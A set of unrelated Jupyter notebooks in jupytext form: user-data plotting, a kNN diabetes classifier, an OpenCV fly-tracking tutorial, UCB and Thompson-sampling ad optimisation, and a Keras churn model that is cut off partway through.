# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:python3] # language: python # name: conda-env-python3-py # --- # # Table of Contents # # [Preparation](#preparation) # # [User data vectors](#userdatavectors) # # [Graphs](#graphs) # # # Preparation # <a id=preparation /> # %run "../Functions/4. User comparison.ipynb" # # Data vectors of users # <a id=userdatavectors /> # + # small sample #allData = getAllUserVectorData( getAllUsers()[:10] ) # complete set #allData = getAllUserVectorData( getAllUsers() ) # subjects which answered the gform #allData = getAllUserVectorData( getAllResponders()[:10] ) allData = getAllUserVectorData( getAllResponders() ) # - allData # # Graphs # <a id=graphs /> columnAllData = allData.T columnAllData['scorebefore'][:5] plt.plot(columnAllData['craft'], columnAllData['equip'], 'ro') plt.xlabel('craft') plt.ylabel('equip') plt.plot(columnAllData['sessionsCount'], columnAllData['craft'], 'ro') plt.xlabel('sessionsCount') plt.ylabel('craft') columnAllData.columns for column in columnAllData.columns: print(column) columnAllData.columns[1] len(columnAllData.columns) for i in range(1,len(columnAllData.columns)): for j in range(i+1,len(columnAllData.columns)): print(i,j) print(columnAllData.columns[i], columnAllData.columns[j]) def plotFromAllUsersData(allUsersData, xcolumnname, ycolumnname): plt.title("plotting '" + ycolumnname + "' against '" + xcolumnname + "'") plt.plot( allUsersData[xcolumnname], allUsersData[ycolumnname], 'ro' ) plt.xlabel(xcolumnname) plt.ylabel(ycolumnname) #plt.show() plotFromAllUsersData( columnAllData, columnAllData.columns[1], columnAllData.columns[2] ) # # Subplot tests # + plt.figure(1) #plt.subplot(131) plt.subplot(311) plotFromAllUsersData( columnAllData, columnAllData.columns[2], columnAllData.columns[3] ) plt.grid(True) #plt.subplot(132) plt.subplot(321) plotFromAllUsersData( columnAllData, columnAllData.columns[2], columnAllData.columns[4] ) plt.grid(True) #plt.subplot(133) plt.subplot(331) plotFromAllUsersData( columnAllData, columnAllData.columns[2], columnAllData.columns[5] ) plt.grid(True) plt.subplots_adjust(top=0.92, bottom=0.08, left=0.10, right=0.95, hspace=0.25, wspace=0.35) plt.show() # + fig = plt.figure() ax1 = fig.add_subplot(221) ax1.plot([1,2,3,4,5], [10,5,10,5,10], 'r-') ax2 = fig.add_subplot(222) ax2.plot([1,2,3,4], [1,4,9,16], 'k-') ax3 = fig.add_subplot(223) ax3.plot([1,2,3,4], [1,10,100,1000], 'b-') ax4 = fig.add_subplot(224) ax4.plot([1,2,3,4], [0,0,1,1], 'g-') plt.tight_layout() fig = plt.gcf() # + fig = plt.figure(figsize=(16,4)) ax1 = fig.add_subplot(131) ax1.plot([1,2,3,4,5], [10,5,10,5,10], 'r-') ax2 = fig.add_subplot(132) ax2.plot([1,2,3,4], [1,4,9,16], 'k-') ax3 = fig.add_subplot(133) ax3.plot([1,2,3,4], [1,10,100,1000], 'b-') plt.tight_layout() fig = plt.gcf() # - def subplotFromAllUsersData(ax, allUsersData, xcolumnname, ycolumnname): plt.title("'" + str(ycolumnname) + "' against '" + str(xcolumnname) + "'") ax.plot( allUsersData[xcolumnname], allUsersData[ycolumnname], 'ro' ) plt.xlabel(xcolumnname) plt.ylabel(ycolumnname) #plt.show() # + fig = plt.figure(figsize=(16,4)) ax1 = fig.add_subplot(131) subplotFromAllUsersData( ax1, columnAllData, columnAllData.columns[2], columnAllData.columns[3] ) ax2 = fig.add_subplot(132) subplotFromAllUsersData( ax2, columnAllData, columnAllData.columns[2], columnAllData.columns[4] ) ax3 = fig.add_subplot(133) subplotFromAllUsersData( ax3, columnAllData, columnAllData.columns[2], columnAllData.columns[5] ) plt.tight_layout() fig = plt.gcf() # - for i in range(0,6): position = 131 + (i % 3) if i % 3 == 0: fig = plt.figure(figsize=(16,4)) ax1 = fig.add_subplot(position) subplotFromAllUsersData( ax1, columnAllData, columnAllData.columns[2], columnAllData.columns[3+i] ) # # Automation tests len(columnAllData.columns) graphsCount = len(columnAllData.columns) * (len(columnAllData.columns) - 1) / 2 graphsCount # # TODO FIXME # ## 1 column of graphs # graphsProgressBar = FloatProgress(min=0, max=graphsCount) # display(graphsProgressBar) # graphsProgressBar.value = 0 # for i in range(0,len(columnAllData.columns)): # xcolumnname = columnAllData.columns[i] # for j in range(i+1,len(columnAllData.columns)): # ycolumnname = columnAllData.columns[j] # plotFromAllUsersData(columnAllData, xcolumnname, ycolumnname) # graphsProgressBar.value += 1 # print("done in " + str(graphsProgressBar.value) + " steps.") # ## 3 columns of graphs graphsProgressBar = FloatProgress(min=0, max=graphsCount) display(graphsProgressBar) graphsProgressBar.value = 0 for i in range(0,len(columnAllData.columns)): xcolumnname = columnAllData.columns[i] for j in range(i+1,len(columnAllData.columns)): ycolumnname = columnAllData.columns[j] # actual plotting position = 131 + (graphsProgressBar.value % 3) if graphsProgressBar.value % 3 == 0: fig = plt.figure(figsize=(16,4)) ax = fig.add_subplot(position) subplotFromAllUsersData( ax, columnAllData, xcolumnname, ycolumnname ) graphsProgressBar.value += 1 print("done in " + str(graphsProgressBar.value) + " steps.")
v1.52/Tests/4.2 User comparison tests graphs.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + id="Ve_yMfQGf1kK" colab={"base_uri": "https://localhost:8080/", "height": 391} outputId="7c0145cd-02d0-4656-f212-8f4a9bf2ed4b" import pandas as pd import numpy as np import matplotlib.pyplot as plt import math df = pd.read_csv('Diabetes.csv') df # + id="u8lV8bQSo2g5" colab={"base_uri": "https://localhost:8080/", "height": 191} outputId="8622fdf6-6967-469f-960e-e92507f7f6f3" df.head() # + colab={"base_uri": "https://localhost:8080/", "height": 277} id="W7N03-ApU1Zf" outputId="c6da5215-0d0f-4eb8-93ad-98be7e64e9f7" df.describe() # + colab={"base_uri": "https://localhost:8080/"} id="uIERydAtU1lN" outputId="be5f087b-5e5e-4d6d-c5ba-9f3d9cb749e8" df.columns # + colab={"base_uri": "https://localhost:8080/"} id="maD0zIU8U1pz" outputId="e4c2ee45-5f04-4c13-af92-97ba7f51460c" df.isnull().sum() # + colab={"base_uri": "https://localhost:8080/"} id="AplKH_NUVF9_" outputId="b55d72ff-227b-44fe-e9d6-134f05d62594" df.shape # + [markdown] id="FQcHG51Gg0xd" # **Proses Normalisasi** # + colab={"base_uri": "https://localhost:8080/", "height": 191} id="Zv7PDRaIamlh" outputId="86ff5b31-4a0b-41de-cec5-fa8da3869cd4" df['Pregnancies'] = (df['Pregnancies']-df['Pregnancies'].min())/(df['Pregnancies'].max()-df['Pregnancies'].min()) df['Glucose'] = (df['Glucose']-df['Glucose'].min())/(df['Glucose'].max()-df['Glucose'].min()) df['BloodPressure'] = (df['BloodPressure']-df['BloodPressure'].min())/(df['BloodPressure'].max()-df['BloodPressure'].min()) df['SkinThickness'] = (df['SkinThickness']-df['SkinThickness'].min())/(df['SkinThickness'].max()-df['SkinThickness'].min()) df['Insulin'] = (df['Insulin']-df['Insulin'].min())/(df['Insulin'].max()-df['Insulin'].min()) df['BMI'] = (df['BMI']-df['BMI'].min())/(df['BMI'].max()-df['BMI'].min()) df['DiabetesPedigreeFunction'] = (df['DiabetesPedigreeFunction']-df['DiabetesPedigreeFunction'].min())/(df['DiabetesPedigreeFunction'].max()-df['DiabetesPedigreeFunction'].min()) df['Age'] = (df['Age']-df['Age'].min())/(df['Age'].max()-df['Age'].min()) df.head() # + [markdown] id="USZ3SdmUgt6f" # **Mengubah nama setiap field** # + colab={"base_uri": "https://localhost:8080/", "height": 191} id="WnM3C3QAfonn" outputId="0f138484-ea57-4eea-c79b-eb4e5d90f1d3" df = df.rename(columns={'Pregnancies':'P', 'Glucose':'G','BloodPressure':'BP', 'SkinThickness' : 'SK', 'Insulin' : 'I', 'DiabetesPedigreeFunction' : 'DP'}) df.head() # + colab={"base_uri": "https://localhost:8080/"} id="xDqRDZ5mrRuQ" outputId="066cd9ce-4f15-4359-8018-770efc468d20" df.info() # + [markdown] id="WazbZH02RbUI" # **Membuat lima dataset baru dengan komposisi objek-objek data pada training set (data latih) dan testing set (data uji**) : # 1. Baris ke-1 sampai baris ke-614 sebagai training set dan sisanya sebagai testing set; # 2. Baris ke-1 sampai baris ke-461 ditambah baris ke-642 sampai 768 sebagai training set dan yang lain sebagai testing set; # 3. Baris ke-1 sampai baris ke-307 ditambah baris ke-462 sampai 768 sebagai training set dan yang lain sebagai testing set; # 4. Baris ke-1 sampai baris ke-154 ditambah baris ke-308 sampai 768 sebagai training set dan yang lain sebagai testing set; dan # 5. Baris ke-155 sampai sampai 768 sebagai training set dan yang lain sebagai testing set. # + [markdown] id="TCljo_6WSQYh" # Data 1-5 # # + id="w-b5n70ogiom" df1_latih = df.iloc[0:614] df1_uji= df.iloc[614:768] df2_latih1 = df.iloc[0:461] df2_latih2 = df.iloc[642:768] frames = [df2_latih1, df2_latih2] df2_latih = pd.concat(frames) df2_uji= df.iloc[461:642] df3_latih1 = df.iloc[0:307] df3_latih2 = df.iloc[462:768] frames1 = [df3_latih1, df3_latih2] df3_latih = pd.concat(frames1) df3_uji = df.iloc[307:462] df4_latih1 = df.iloc[0:154] df4_latih2 = df.iloc[308:768] frames2 = [df4_latih1, df4_latih2] df4_latih = pd.concat(frames2) df4_uji = df.iloc[154:308] df5_latih = df.iloc[155:768] df5_uji = df.iloc[0:155] # + id="189OZQJzt1Q6" def knn(df_latih,df_uji,K,akurasi): for i in range(len(df_uji)): df_latih_copy = df_latih.copy() df_latih_copy df_latih_copy['jarak'] = np.sqrt(pow(df_uji.iloc[i,0] - df_latih_copy['P'],2) + pow(df_uji.iloc[i,1] - df_latih_copy['G'],2) + pow(df_uji.iloc[i,2] - df_latih_copy['BP'],2) + pow(df_uji.iloc[i,3] - df_latih_copy['SK'],2) + pow(df_uji.iloc[i,4] - df_latih_copy['I'],2) + pow(df_uji.iloc[i,5] - df_latih_copy['BMI'],2) + pow(df_uji.iloc[i,6] - df_latih_copy['DP'],2) + pow(df_uji.iloc[i,7] - df_latih_copy['Age'],2)) df_latih_copy_sort = df_latih_copy.sort_values(by ='jarak') hit_1 = 0 hit_0 = 0 hit_k = 0 for j in range(K): if (df_latih_copy_sort.iloc[j,8] == 1): hit_1 = hit_1 + 1 else: hit_0 = hit_0 + 1 if (hit_0 < hit_1): hit_k = 1 else: hit_k = 0 if (hit_k == df_uji.iloc[i,8]): akurasi = akurasi + 1 else: akurasi = akurasi + 0 return akurasi,len(df_uji) # + [markdown] id="ByHAYiVacC5k" # **Program Utama** # + colab={"base_uri": "https://localhost:8080/"} id="Dfb5KfT7XLIm" outputId="ce4ceaf3-0ab6-4f45-bca3-c28cc55c59ed" K = 9 #Data ke 1 data1_akurasi = knn(df1_latih,df1_uji,K,0)[0] besar_df1 = knn(df1_latih,df1_uji,K,0)[1] data1_akurasi_r = data1_akurasi / besar_df1 print('K = 1 ') print('Akurasi :', data1_akurasi_r*100,'%') print(' ') #Data ke 2 data2_akurasi = knn(df2_latih,df2_uji,K,0)[0] besar_df2 = knn(df2_latih,df2_uji,K,0)[1] data2_akurasi_r = data2_akurasi / besar_df2 print('K = 2 ') print('Akurasi :', data2_akurasi_r*100,'%') print(' ') #Data ke 3 data3_akurasi = knn(df3_latih,df3_uji,K,0)[0] besar_df3 = knn(df3_latih,df3_uji,K,0)[1] data3_akurasi_r = data3_akurasi / besar_df3 print('K = 3 ') print('Akurasi :', data3_akurasi_r*100,'%') print(' ') #Data ke 4 data4_akurasi = knn(df4_latih,df4_uji,K,0)[0] besar_df4 = knn(df4_latih,df4_uji,K,0)[1] data4_akurasi_r = data4_akurasi / besar_df4 print('K = 4 ') print('Akurasi :', data4_akurasi_r*100,'%') print(' ') #Data ke 5 data5_akurasi = knn(df5_latih,df5_uji,K,0)[0] besar_df5 = knn(df5_latih,df5_uji,K,0)[1] data5_akurasi_r = data5_akurasi / besar_df5 print('K = 5 ') print('Akurasi :', data5_akurasi_r*100,'%') print(' ') hasil = data1_akurasi_r #Menghitung nilai rata2 akurasi total_avg_akurasi = (data1_akurasi_r + data2_akurasi_r + data3_akurasi_r + data4_akurasi_r + data5_akurasi_r) / 5 if (data1_akurasi_r>data2_akurasi_r) & (data1_akurasi_r>data3_akurasi_r) & (data1_akurasi_r>data4_akurasi_r) & (data1_akurasi_r>data5_akurasi_r) : hasil = data1_akurasi_r elif (data2_akurasi_r>data1_akurasi_r) & (data2_akurasi_r>data3_akurasi_r) & (data2_akurasi_r>data4_akurasi_r) & (data2_akurasi_r>data5_akurasi_r) : hasil = data2_akurasi_r elif (data3_akurasi_r>data1_akurasi_r) & (data3_akurasi_r>data2_akurasi_r) & (data3_akurasi_r>data4_akurasi_r) & (data3_akurasi_r>data5_akurasi_r) : hasil = data3_akurasi_r elif (data4_akurasi_r>data1_akurasi_r) & (data4_akurasi_r>data2_akurasi_r) & (data4_akurasi_r>data3_akurasi_r) & (data4_akurasi_r>data5_akurasi_r) : hasil = data4_akurasi_r elif (data5_akurasi_r>data1_akurasi_r) & (data5_akurasi_r>data2_akurasi_r) & (data5_akurasi_r>data3_akurasi_r) & (data5_akurasi_r>data4_akurasi_r) : hasil = data5_akurasi_r print('Akurasi rata-rata : ', total_avg_akurasi*100, '%') print('Nilai Akurasi terbaik',hasil*100,'%')
Tube03knn_1301174181.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # <h1 id="Introduction-to-OpenCV">Introduction to OpenCV<a class="anchor-link" href="#Introduction-to-OpenCV">¶</a></h1><p>This jupyter notebook gets you started with OpenCV. It introduces the basics you will need to perform the analysis of the data you captured last week. It is not comprehensive with respect to the methods you need to use to track the flies centroids and heading direction. For additional methods refere to last weeks presentation and OpenCV's documentation online.</p> # <h2 id="Installation">Installation<a class="anchor-link" href="#Installation">¶</a></h2><p>You can test if you have all the necessary packages installed by running the cell below. Should you receive any import errors you can use pip to install the missing package. Try the following commands to do that:<br/> # <code>pip install opencv_python</code> or <code>python -m pip install opencv_python</code><br/> # <code>pip install numpy</code> or <code>python -m pip install numpy</code><br/> # <code>pip install matplotlib</code> or <code>python -m pip install matplotlib</code></p> # import cv2 import numpy as np from matplotlib import pyplot as plt # This line is necessary to show the images inside the jupyter notebook. # %matplotlib inline # # <p>First, we need to load an image from file.</p> # img = cv2.imread('img_5.jpg') # # <p>The returned image is a numpy array of data type uint8.</p> # print(type(img)) print(img.dtype) # # <p>We know our image is a gray scale image so we can convert it from RGB representation.</p> # print(img.shape) img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) print(img.shape) # # <p>To display the image, you can use matplotlib or OpenCV if you are not working in a jupyter notebook.<br/> # (OpenCV:<code>cv2.imshow('image',img); cv2.waitKey(0)</code>)</p> # plt.imshow(img, cmap='gray') kernel = np.ones((5,5),np.float32)/25 #filt = cv2.filter2D(img,-1,kernel) #filt = cv2.medianBlur(img,5) #filt = cv2.bilateralFilter(img,7,30,30) #filt = cv2.bilateralFilter(img,13,30,30) filt = cv2.bilateralFilter(img,15,5,5) plt.imshow(filt, cmap='gray') plt.show() clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8,8)) cl = clahe.apply(filt) plt.imshow(cl, cmap='gray') plt.show() equ = cv2.equalizeHist(filt) plt.imshow(equ, cmap='gray') plt.show() edge = cv2.Canny(equ,100,250) edge_o = cv2.Canny(img,100,200) plt.imshow(edge, cmap='gray') plt.show() plt.imshow(edge_o, cmap='gray') plt.show() # # <p>Next, we will apply a binary thereshold to the image using OpenCV.</p> # #ret, mask = cv2.threshold(equ, 120, 255, cv2.THRESH_BINARY) mask2 = cv2.adaptiveThreshold(equ, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 195, 60) mask1 = cv2.adaptiveThreshold(filt, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 195, 25) plt.imshow(mask1, cmap='gray') plt.show() plt.imshow(mask2, cmap='gray') plt.show() plt.imshow(255 - (255-mask1) - (255-mask2), cmap='gray') plt.show() mask2 = 255 - (255-mask1) - (255-mask2) kernel_co = np.ones((15,15),np.uint8) kernel_dil = np.ones((20,25),np.uint8) closing = cv2.morphologyEx(mask2, cv2.MORPH_CLOSE, kernel_co) opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, kernel_co) dilation = cv2.erode(opening, kernel_dil, 100) plt.imshow(dilation, cmap='gray') plt.show() mask = 255 - dilation outcome = cv2.bitwise_and(equ, equ, mask=mask) plt.imshow(outcome, cmap='gray') plt.show() edge1 = cv2.Canny(filt,20,255) edge = edge1 * mask plt.imshow(edge, cmap='gray') plt.show() mask3 = mask2 ids = np.argwhere(mask.flatten() == 0) print(ids) mask3_fl = mask3.flatten() mask3_fl[ids] = 255 mask3_fl = mask3_fl.reshape(mask.shape[0], -1) print(mask3_fl.shape) #plt.scatter(ids.T[1], ids.T[0]) plt.imshow(mask3_fl, cmap='gray') plt.show() img1 = img * (255-mask3_fl) plt.imshow(img1, cmap='gray') plt.show() th = mask3_fl # + #circular kernel kernel = np.ones((5,5),np.uint8) for i in [0,4]: for j in [0,4]: kernel[i,j] = 0 kernel[j,i] = 0 #contour con = edge.copy() _, contours, hierarchy = cv2.findContours(con,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) con = cv2.drawContours(con, contours, -1, (255,25,25), 6) # - plt.imshow(con, cmap='gray') plt.show() # + #morphology filters #th = cv2.morphologyEx(th,cv2.MORPH_OPEN, kernel) #filling edges image to get centers of flies h, w = th.shape[:2] mask = np.zeros((h+2, w+2), np.uint8) fill = con.copy() cv2.floodFill(fill, mask, (0,0), 255) #dilate to get better shape of flies fill = cv2.dilate(fill,kernel,iterations = 1) fill = cv2.erode(fill,kernel,iterations = 2) #remove lines y_size = fill.shape[0] x_size = fill.shape[1] lines = fill.copy()/255 for x in range(x_size): if np.sum(lines[:,x])<(y_size*0.85): lines[:,x-12:x+12] = np.ones((y_size,24)) for y in range(y_size): if np.sum(lines[y,:])<(x_size*0.75): lines[y-12:y+12,:] = np.ones((24,x_size)) lines = lines*255 # - plt.imshow(lines, cmap='gray') plt.show() # # <p>We have to invert the image because the flies are our ROIs and not the background.</p> # # # <p>To analyze connected components in a binary image you can use OpenCV's connectedComponentsWithStats function.</p> # output = cv2.connectedComponentsWithStats(mask, 4, cv2.CV_32S) label_img = output[1].astype(np.uint8) centroids = output[3] sizes = output[2][:, 4] largest_ids = np.argsort(sizes)[::-1][:7] largest = centroids[largest_ids] sizes[largest_ids] plt.imshow(label_img) plt.scatter(largest.T[0], largest.T[1]) plt.show() print('Centroids', output[3]) print('Sizes', output[2][:, 4])
jupyter/opencv_introduction.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Advertisement CTR optimisation # + [markdown] colab_type="text" id="QJdrJJQUv3-k" # # Upper Confidence Bound (UCB) # + [markdown] colab_type="text" id="2XCjepjJwEv-" # ## Importing the libraries # + colab={} colab_type="code" id="l_mBkG3YwNTt" import numpy as np import matplotlib.pyplot as plt import pandas as pd # + [markdown] colab_type="text" id="npqlXjaNwYTv" # ## Importing the dataset # + colab={} colab_type="code" id="HMJfUVLVwcFc" dataset = pd.read_csv('Ads_CTR_Optimisation.csv') # - # ## Upper Confidence Bound Algorithm # # ### Step 1 # At each round n, we consider two numbers for each ad i: # # N<sub>i</sub>(n) - the number of times the ad i was selected up to round n # # R<sub>i</sub>(n) - the sum of rewards of the ad i up to round n # # ### Step 2 # From these two numbers we compute: # # The average reward of ad i upto round n # # r_avg<sub>i</sub>(n) = R<sub>i</sub>(n) / N<sub>i</sub>(n) # # The confidence interval [ r_avg<sub>i</sub>(n) - &Delta;<sub>i</sub>(n) , r_avg<sub>i</sub>(n) + &Delta;<sub>i</sub>(n) ] at # round n with # # &Delta;<sub>i</sub>(n) = &radic;3log(n) / 2 N<sub>i</sub>(n)) # # ### Step 3 # We select the ad i that has the maximum UCB r_avg<sub>i</sub>(n) + &Delta;<sub>i</sub>(n) # # # # # + [markdown] colab_type="text" id="PaSbots_wfoB" # ## Implementing UCB # + colab={} colab_type="code" id="V1K7jgDFwkRd" import math N = 1000 d = 10 ads_selected = [] numbers_of_selections = [0] * d sums_of_rewards = [0] * d total_reward = 0 for n in range(0, N): ad = 0 max_upper_bound = 0 for i in range(0, d): if (numbers_of_selections[i] > 0): average_reward = sums_of_rewards[i] / numbers_of_selections[i] delta_i = math.sqrt(3/2 * math.log(n + 1) / numbers_of_selections[i]) upper_bound = average_reward + delta_i else: upper_bound = 1e400 if upper_bound > max_upper_bound: max_upper_bound = upper_bound ad = i ads_selected.append(ad) numbers_of_selections[ad] = numbers_of_selections[ad] + 1 reward = dataset.values[n, ad] sums_of_rewards[ad] = sums_of_rewards[ad] + reward total_reward = total_reward + reward # + [markdown] colab_type="text" id="AXftWcjDwsYj" # ## Visualising the results # + colab={"base_uri": "https://localhost:8080/", "height": 295} colab_type="code" executionInfo={"elapsed": 2141, "status": "ok", "timestamp": 1586416167859, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhEuXdT7eQweUmRPW8_laJuPggSK6hfvpl5a6WBaA=s64", "userId": "15047218817161520419"}, "user_tz": -240} id="eVyD_EDXwtkK" outputId="8cb6b886-8482-43be-e4ee-0313c17508c6" plt.hist(ads_selected) plt.title('Histogram of ads selections') plt.xlabel('Ads') plt.ylabel('Number of times each ad was selected') plt.show() # - # # Thompson Sampling # ## Implementing Thompson Sampling # ## Thompson Sampling Algorithm # # ### Step 1 # At each round n, we consider two numbers for each ad i: # # N<sub>i</sub><sup>1</sup>(n) - the number of times the ad i got reward 1 up to round n # # N<sub>i</sub><sup>0</sup>(n) - the number of times the ad i got reward 1 up to round n # # ### Step 2 # For each ad i, we take a random draw from the distribution below: # # &theta;<sub>i</sub>(n) = &beta;( N<sub>i</sub><sup>1</sup>(n) + 1 , N<sub>i</sub><sup>0</sup>(n) + 1 ) # # ### Step 3 # We select the ad that has the highest &theta;<sub>i</sub>(n) # # # # # # # # import random N = 500 d = 10 ads_selected = [] numbers_of_rewards_1 = [0] * d numbers_of_rewards_0 = [0] * d total_reward = 0 for n in range(0, N): ad = 0 max_random = 0 for i in range(0, d): random_beta = random.betavariate(numbers_of_rewards_1[i] + 1, numbers_of_rewards_0[i] + 1) if random_beta > max_random: max_random = random_beta ad = i ads_selected.append(ad) reward = dataset.values[n, ad] if reward == 1: numbers_of_rewards_1[ad] = numbers_of_rewards_1[ad] + 1 else: numbers_of_rewards_0[ad] = numbers_of_rewards_0[ad] + 1 total_reward = total_reward + reward # ## Visualising the results - Histogram plt.hist(ads_selected) plt.title('Histogram of ads selections') plt.xlabel('Ads') plt.ylabel('Number of times each ad was selected') plt.show() # <i>Our goal is to find the ad which has the highest conversion rate with minimum number of rounds or users since more the rounds more is the cost incurred to the advertisement company.</i> # # <i> We can see that Upper Confidence Bound requires minimum 1000 rounds to detect ad 4 has the highest conversion rate but Thompson Sampling algorithm only takes 500 rounds to detect ad 4 has the highest conversion rate. So Thompson Sampling algorithm performs better than UCB algorithm.</i>
Ads-CTR-Optimisation/Ads_optimise.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] id="lP6JLo1tGNBg" # # Artificial Neural Network # + id="VC45bT-kLXtj" executionInfo={"status": "ok", "timestamp": 1602179924025, "user_tz": 300, "elapsed": 741, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="3786baff-9f2a-4930-9329-d315f9bb6ee4" colab={"base_uri": "https://localhost:8080/", "height": 55} from google.colab import drive drive.mount('/content/drive') # + [markdown] id="gWZyYmS_UE_L" # ### Importing the libraries # + id="eRa__MBINE8e" executionInfo={"status": "ok", "timestamp": 1602179925797, "user_tz": 300, "elapsed": 2495, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} import numpy as np import pandas as pd import tensorflow as tf # + id="Y_EtOxyzNKX7" executionInfo={"status": "ok", "timestamp": 1602179925801, "user_tz": 300, "elapsed": 2483, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="3433772c-b40b-4d6d-84d6-e3094c8c547a" colab={"base_uri": "https://localhost:8080/", "height": 36} tf.__version__ # + [markdown] id="1E0Q3aoKUCRX" # ## Part 1 - Data Preprocessing # + [markdown] id="cKWAkFVGUU0Z" # ### Importing the dataset # + id="NlAepGobNkc7" executionInfo={"status": "ok", "timestamp": 1602179925804, "user_tz": 300, "elapsed": 2466, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="8be9b9da-6393-40fa-87a0-0a5ac9b704af" colab={"base_uri": "https://localhost:8080/", "height": 226} df = pd.read_csv('/content/drive/My Drive/Data/Churn_Modelling.csv') df.head() # + id="-q7byvQbUORe" executionInfo={"status": "ok", "timestamp": 1602179925812, "user_tz": 300, "elapsed": 2463, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} df.drop(['RowNumber', 'CustomerId', 'Surname'], axis=1, inplace=True) # + id="6x3KPJpmOIk7" executionInfo={"status": "ok", "timestamp": 1602179925814, "user_tz": 300, "elapsed": 2451, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="29b5d0db-d110-4b9d-e9d8-932b3b415ddc" colab={"base_uri": "https://localhost:8080/", "height": 146} print(df.iloc[:, :-1].values) # + id="H6-y41cGOKyK" executionInfo={"status": "ok", "timestamp": 1602179925817, "user_tz": 300, "elapsed": 2437, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="46779c85-2dc5-4fbd-c2cc-01de2b84017a" colab={"base_uri": "https://localhost:8080/", "height": 35} print(df.iloc[:, -1].values) # + [markdown] id="N6bQ0UgSU-NJ" # ### Encoding categorical data # + [markdown] id="le5MJreAbW52" # Label Encoding the "Gender" column # + id="RKCM68s9Pt2K" executionInfo={"status": "ok", "timestamp": 1602179925819, "user_tz": 300, "elapsed": 2431, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} df['Gender']= np.where(df['Gender']=='Female', 0, 1) # from sklearn.preprocessing import LabelEncoder # le = LabelEncode() # X = df.iloc[:, :-1].values # X[:, 2] = le.fit_transform(X[:, 2]) # + [markdown] id="CUxGZezpbMcb" # One Hot Encoding the "Geography" column # + id="Su18A0C3Tqhf" executionInfo={"status": "ok", "timestamp": 1602179925819, "user_tz": 300, "elapsed": 2418, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="45a26149-c63a-4a16-f267-bad0b95afd85" colab={"base_uri": "https://localhost:8080/", "height": 226} df = pd.concat([pd.get_dummies(df['Geography']), df], axis=1) df.drop('Geography', axis=1, inplace=True) df.head() # from sklearn.compose imoprt ColumnTransformer # from sklearn.preprocessing import OneHotEncoder # X = df.iloc[:, :-1].values # ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [1])], remainder='passthrough') # X = np.array(ct.fit_transform(X)) # + [markdown] id="vHol938cW8zd" # ### Splitting the dataset into the Training set and Test set # + id="LTP-gI-cXv_b" executionInfo={"status": "ok", "timestamp": 1602180054868, "user_tz": 300, "elapsed": 455, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} X = df.iloc[:, :-1].values y = df.iloc[:, -1].values # + id="ZiRY8azDX5Fr" executionInfo={"status": "ok", "timestamp": 1602180066857, "user_tz": 300, "elapsed": 1131, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="a0d39625-65de-42fe-b7d0-8739b181e576" colab={"base_uri": "https://localhost:8080/", "height": 256} print(X) # + id="wzPvgnkNX8I8" executionInfo={"status": "ok", "timestamp": 1602180076739, "user_tz": 300, "elapsed": 740, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="b73f4664-dedd-4e8c-babe-4fddd19316ec" colab={"base_uri": "https://localhost:8080/", "height": 35} print(y) # + id="FgTcYQdZXjsb" executionInfo={"status": "ok", "timestamp": 1602180219485, "user_tz": 300, "elapsed": 507, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) # + [markdown] id="RE_FcHyfV3TQ" # ### Feature Scaling # + id="i3A4CQoJYArN" executionInfo={"status": "ok", "timestamp": 1602180240483, "user_tz": 300, "elapsed": 498, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} from sklearn.preprocessing import StandardScaler sc = StandardScaler() X_train = sc.fit_transform(X_train) X_test = sc.transform(X_test) # + [markdown] id="-zfEzkRVXIwF" # ## Part 2 - Building the ANN # + [markdown] id="KvdeScabXtlB" # ### Initializing the ANN # + id="niONB_83Y5Td" executionInfo={"status": "ok", "timestamp": 1602181064470, "user_tz": 300, "elapsed": 536, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} ann = tf.keras.models.Sequential() # + [markdown] id="rP6urV6SX7kS" # ### Adding the input layer and the first hidden layer # + id="PZhEDe34ZgF9" executionInfo={"status": "ok", "timestamp": 1602181067552, "user_tz": 300, "elapsed": 616, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} # try 